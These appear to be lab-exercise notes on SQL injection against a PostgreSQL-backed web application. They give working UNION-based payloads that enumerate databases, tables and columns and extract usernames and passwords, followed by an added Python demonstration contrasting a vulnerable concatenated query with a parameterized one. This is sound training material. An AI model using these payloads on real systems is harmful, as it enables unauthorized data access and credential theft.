05 - SQL injection attack, listing the database contents on non-Oracle databases

'+UNION+SELECT+version(),version()+--+-

PostgreSQL found

https://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet

Extract the database names

'+UNION+SELECT+datname,'a'+FROM+pg_database+--+- 

List the table names

SELECT table_schema, table_name
FROM information_schema.tables
WHERE table_type = 'BASE TABLE' AND table_schema NOT IN ('pg_catalog', 'information_schema');

List the column names

SELECT column_name, data_type, is_nullable
FROM information_schema.columns
WHERE table_schema = 'public' AND table_name = 'nombre_tabla';

'+UNION+SELECT+column_name,data_type+FROM+information_schema.columns+WHERE+table_schema+=+'public'+AND+table_name+=+'users_pssqck'+--+-

List the data

'+UNION+SELECT+username_wbpptu,password_uvrxkv+FROM+users_pssqck+--+-
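
Why the payloads above work, and the fix, as an added example (not part of the original notes): the last payload is run against a concatenated query and against a bound-parameter query. The products table, the sample rows and the use of in-memory SQLite in place of PostgreSQL are assumptions made so it runs offline.

```python
import sqlite3
from urllib.parse import unquote_plus

# Payload from the notes above, as it appears in the URL (the lab's own names).
PAYLOAD = "'+UNION+SELECT+username_wbpptu,password_uvrxkv+FROM+users_pssqck+--+-"
# What the server-side code receives after URL decoding.
CATEGORY = unquote_plus(PAYLOAD)


def build_db():
    """Constructed stand-in schema: a two-column product query plus the users table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (name TEXT, description TEXT, category TEXT);
        CREATE TABLE users_pssqck (username_wbpptu TEXT, password_uvrxkv TEXT);
        INSERT INTO products VALUES ('Mug', 'Ceramic mug', 'Gifts');
        INSERT INTO users_pssqck VALUES ('administrator', 'constructed-secret');
    """)
    return db


def products_vulnerable(db, category):
    # String concatenation: the quote in the input closes the literal, the
    # UNION branch is parsed as SQL, and "-- -" comments out the trailing quote.
    sql = ("SELECT name, description FROM products "
           "WHERE category = '" + category + "'")
    return db.execute(sql).fetchall()


def products_parameterized(db, category):
    # Bound parameter: the whole input is compared as a single string value,
    # so no part of it is ever parsed as SQL.
    sql = "SELECT name, description FROM products WHERE category = ?"
    return db.execute(sql, (category,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("decoded input:", CATEGORY)
    print("vulnerable:   ", products_vulnerable(db, CATEGORY))
    print("parameterized:", products_parameterized(db, CATEGORY))
```
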